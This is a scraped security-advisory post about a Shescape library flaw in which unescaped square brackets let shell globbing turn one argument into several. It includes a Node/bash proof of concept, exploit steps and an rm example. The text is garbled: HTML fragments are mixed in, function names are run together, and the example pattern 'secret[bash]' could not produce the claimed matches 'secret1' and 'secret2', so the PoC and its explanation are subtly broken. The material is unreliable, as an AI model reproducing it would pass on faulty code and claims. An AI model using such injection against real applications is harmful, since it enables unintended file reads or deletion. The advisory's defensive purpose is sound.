Listen to this Post
The vulnerability exists in Shescape versions prior to 2.1.10 because the `escape()` function fails to escape square brackets ([ and ]) for the Bash, BusyBox sh, and Dash shells . When processing untrusted input containing patterns like secret
</code>, the library correctly escapes other special characters such as `` and `?` but leaves the brackets untouched. This occurs because the internal Unix escape helper regexes in <code>src/internal/unix/bash.js</code>, <code>busybox.js</code>, and `dash.js` do not include brackets in their list of special characters to escape. Consequently, when an application interpolates the returned value directly into a shell command string, the shell interprets the brackets as a glob pattern. The shell then performs pathname expansion, matching any files in the working directory that fit the pattern (e.g., `secret1` and <code>secret2</code>). This transforms what should be a single literal argument into multiple file path arguments, leading to argument injection. The project's own test fixtures confirm this behavior by expecting literal brackets for these specific shells. The official documentation recommends using `Shescapeescape()` as a fallback for `exec()` when quoting is not possible, which increases the likelihood of vulnerable usage patterns . <h2 style="color: blue;">dailycve form:</h2> Platform: Node.js Version: 2.1.9 Vulnerability :Argument Injection Severity: Medium date: March 11, 2026 <h2 style="color: blue;">Prediction: Patched in 2.1.10</h2> <h2 style="color: blue;">What Undercode Say:</h2> <h2 style="color: blue;">Analytics:</h2> The vulnerability affects any application using `Shescapeescape()` with Bash, BusyBox sh, or Dash shells where the output is concatenated into a shell command string. The flaw exists because the escape function handles globbing characters inconsistently. <h2 style="color: blue;">Bash Commands and PoC:</h2> [bash] Create a temporary directory and set up vulnerable environment tmp=$(mktemp -d) cd "$tmp" Download the vulnerable package (version 2.1.9) npm pack [email protected] >/dev/null mkdir pkg tar -xzf shescape-2.1.9.tgz -C pkg cd pkg/package npm install --omit=dev Create test files that will match the glob pattern mkdir test_dir cd test_dir touch secret1 secret2 Run the proof of concept node --input-type=module - <<'NODE' import { mkdtempSync, writeFileSync } from "node:fs"; import { tmpdir } from "node:os"; import path from "node:path"; import { execSync } from "node:child_process"; import { Shescape } from "../src/index.js"; const dir = mkdtempSync(path.join(tmpdir(), "shescape-poc-")); writeFileSync(path.join(dir, "secret1"), ""); writeFileSync(path.join(dir, "secret2"), ""); for (const shell of ["/usr/bin/bash", "/usr/bin/dash"]) { const shescape = new Shescape({ shell }); const escaped = shescape.escape("secret[bash]"); console.log(<code>${shell} escaped=${escaped}</code>); const out = execSync(<code>printf '<%s>\\n' ${escaped}</code>, { cwd: dir, shell }).toString(); process.stdout.write(out); } NODE Output shows <secret1> and <secret2> instead of <secret[bash]>
How Exploit:
1. Attacker controls input string (e.g., `secret[bash]`).
2. Application calls `Shescape.escape()` on this input.
- The function returns the string without escaping the brackets.
- Application interpolates result into a shell command:
ls -l {escaped}.
5. Shell interprets `secret[bash]` as a glob pattern.
- If files named `secret1` and `secret2` exist, they are passed as separate arguments.
- This changes the command behavior from operating on one file to operating on multiple files.
Protection from this CVE:
- Immediate Fix: Update Shescape to version 2.1.10 or later .
- Code Change: If unable to upgrade, manually escape square brackets by replacing `[` with `\[` and `]` with `\]` before passing input to
escape(). - Avoidance: Use `Shescape.quote()` instead of `escape()` when possible, or avoid concatenating escaped values directly into shell command strings.
- Workaround: Ensure untrusted input is always the last argument to minimize the impact of expansion.
Impact:
Successful exploitation allows an attacker to turn a single controlled argument into multiple arguments by leveraging filesystem pathname expansion. This can lead to:
- Information Disclosure: Leaking filenames through command output if the expanded arguments are reflected in results.
- Unintended File Operations: Deleting, reading, or modifying unintended files if the command operates on multiple files (e.g., `rm {escaped}` could delete `secret1` and `secret2` instead of just secret[bash]).
- Command Behavior Alteration: Changing the logic of commands that interpret multiple arguments differently than a single argument.
References:
- CVE Record: CVE-2026-32094
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

